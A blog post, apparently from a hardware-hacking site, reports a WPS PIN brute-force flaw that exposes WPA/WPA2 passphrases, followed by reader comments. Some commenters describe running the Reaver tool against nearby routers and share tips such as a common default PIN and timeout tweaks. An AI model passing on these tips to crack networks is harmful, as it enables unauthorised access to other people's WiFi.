A chink in the armor of WPA/WPA2 WiFi security

Looks like your WiFi might not be quite as secure as you thought it was. A paper recently published by [Stefan Viehböck] details a security flaw in the supposedly robust WPA/WPA2 WiFi security protocol. It’s not actually that protocol which is the culprit, but an in-built feature called Wi-Fi Protected Setup. This is an additional security protocol that allows you to easily setup network devices like printers without the need to give them the WPA passphrase. [Stephan’s] proof-of-concept allows him to get the WPS pin in 4-10 hours using brute force. Once an attacker has that pin, they can immediately get the WPA passphrase with it. This works even if the passphrase is frequently changed.

Apparently, most WiFi access points not only offer WPS, but have it enabled by default. To further muck up the situation, some hardware settings dashboards offer a disable switch that doesn’t actually do anything!

It looks like [Stephan] wasn’t the only one working on this exploit. [Craig] wrote in to let us know he’s already released software to exploit the hole.

Post navigation

59 thoughts on “A chink in the armor of WPA/WPA2 WiFi security”

Oh good you had me worried for a second there. I don’t use that junk anyway. :-) I’ll bet most of us readers actually enjoy setting up our new networking hardware and never bothered with WPS. It is a little scary, however, to read that in some routers turning it off doesn’t actually do anything.

I just the reaver wps_pin_checksum() function the pin 1234567 and it returned a checksum of 0, not the 8 that I was expecting. I then looked at my actiontec router label in a brighter light, and indeed, it is a zero with a slash, which looks a lot like an 8.

I did mean WPS by “junk.” I guess I prematurely assumed disabling it in my router actually meant it was disabled. I then tested it and disabling WPS actually works for Motorola “Surfboard.”
As far as which firmwares are junk, stock or custom, I’ve noticed a fair amount of bugs in both.

Drat. I’ve got that routed, but I’ve been looking at it sideways for months now. It only serves as a wireless access point and a switch… but I’ll be damned if I didn’t lose the thing on my network. It doesn’t show up in a ping sweep anywhere. It doesn’t show up as a hop. It’s just…missing.

I just checked mine, and yup, it’s enabled by default (now disabled). I never used WPS, so I didn’t even think about its vulnerability, and I didn’t know it was always on. That really shouldn’t be enabled by default.

I’m just ignorant of the method he’s talking about. Not familiar with one that needs two computers. Just making sure it’s not the same old guess the password method. If I acted cool I wasn’t trying, it’s just something that happens when you’re cool I guess.

I’m already testing out this software. It works pretty good so far. It has a few minor bugs but the author is on top of them and has already released some updates to the code.
I’m using it on a VM of BT4R2 with an Alfa AWUS036H. It’s slow, but fast as shit compared to trying to crack WPA using a wordlist with the huge possibility of it not succeeding.
So far, every network around me is vulnerable to this attack. There isn’t a single one where WPS is disabled. And some of the people around me are supposedly tech experts working for comcast and verizon.
Something about WPS never seemed all that safe to me. I’ve always had it disabled. I’m surprised it took this long for someone to find an easily exploitable flaw.

Should the router makers care about the 1% of users who care about security?
Or the 99% who just want to plug in a printer and see it work? (and they don’t give a fuck about security)
HMM. That’s a tough choice, huh… lol
Defaults are for the 99%… They don’t even need to know the printer has an “Aye-pee”. (IP)
The paper just travels like magic from the computer to the tray.

I think we should forbid Hamlet too because Polonius is killed because Hamlet thinks is another one behind the curtain. Curtains don’t kill people, people kill people. And we should stop with The Merchant of Venice too because of its antisemitism. We should call black tie dressing afro-american tie, we should call women people of female gender, and specially people like you of mentally challenged and not retarded.

Good ol Openwrt, it has the lovely ‘feature’ of not supporting WPS at all in the Luci interface. Sure hostapd supports it but theres no frontend unless you feel like coding up your own, how thoughful of them.

Nothing – NOTHING – is ever secure as people think it is. That has been proven against every new ‘secure’ technology that comes out.

Whether it’s tricking people into revealing their passwords, or stupid SQL administration that leads to internal document exposure that contains decryption keys, nothing will ever be completely secure.

Now broadcast encryption information over some wireless bands and let’s see how security ratings drop precipitously.

There is a difference between things being insecure and things being badly implemented. As far as I can tell WPA/WPA2 are still fairly secure.. i.e. capturing cipther text and turning it into plain text is not trivial. Router vendors being retarded and shipping units with predictable keys etc doesn’t mean that “WPA is insecure” just that the vendors implementation is bad.

>>That has been proven against every new
>>‘secure’ technology that comes out.

After using reaver an a brand new Asus router with WPS turned off, we were shocked to see it print out our multi-word and symbol WPA2 passphrase in less than two hours.

Other routers were getting timeout errors, but after adjusting the timeout to 20 seconds 3 of them fell prey to reaver in less than a day. We may try a timeout of 25 seconds for the ones that are resisting.

Perhaps WPA isn’t cracked, but WPA *ROUTERS* are dropping like flies around here.

And by the way, most of them (multiple different brands) have a PIN code of 12345670, and most of them have WPS off. We could have gotten this done a LOT quicker if reaver checked that “standard default” PIN first.

Interesting, that new router that spilled its secrets so fast was from Asus, whose products are not even listed in the Cert advisory list of vulnerable routers.

When I first started setting up wireless nets, there was no such thing as WPS. I just got used to setting everything up by hand. When I bought my first router that did have WPS, I couldn’t get the thing to work using the WPS, so I just set it up manually and disabled the WPS. So, even now I still set up my nets manually, and disable WPS every time. I guess sometimes it’s good to be set in your ways.

some 6 months before this article was published i was trying to connect to some network in windows and when got prompt for entering pin an idea crossed my mind: this shit might be easy to bruteforce :D